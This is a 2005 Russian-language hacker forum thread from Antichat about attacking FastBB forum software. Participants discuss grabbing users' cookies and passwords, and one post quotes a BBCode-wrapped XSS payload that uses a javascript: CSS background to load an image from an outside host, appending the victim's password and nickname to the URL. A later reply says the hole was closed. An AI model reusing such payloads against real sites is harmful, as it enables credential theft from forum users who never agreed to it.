ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос про уязвимости в форумах FastBB (https://forum.antichat.xyz/showthread.php?t=9876)

*Van* 08.11.2005 21:14

Да про вар пасс это я знаю! Но сначал нужно войти же! А ты кстати сам попробуй-войди и в опере куки глянь-будут такие странные...

QUERY=t=1131467916; s=9тsbbт9sфжxvb2wщ

*Van* 12.11.2005 17:47

Джордан, всё уже я даже видео снял. Там не куки присылать надо а сам пасс, и ник ещё (там всё в открытом виде лежит).
А если мы получаем куки, то подставить их нереально...
А насчёт поклоничества =) где же я тебя найти могу =)))

aGGreSSor 17.11.2005 14:19

Сцыла на XSS от медведя:
http://forum.netsec.ru/index.php?showtopic=93

Цитата:

[font color=[img src=http://s.netsec.ru/s.gif/style=display:none;background%3Aurl%28javascript%3 Adocument.images%5B1%5D.src%3D%22http%3A%2F%2Fs.ne tsec.ru%2F%2Fs.gif%3Fid%3D76%26%22+pass+nick.); ]][/font]
Всё портит кавычка в конце. Комментарии?

aGGreSSor 17.11.2005 18:33

Проехали. Закрыта уязвимость..


Время: 04:12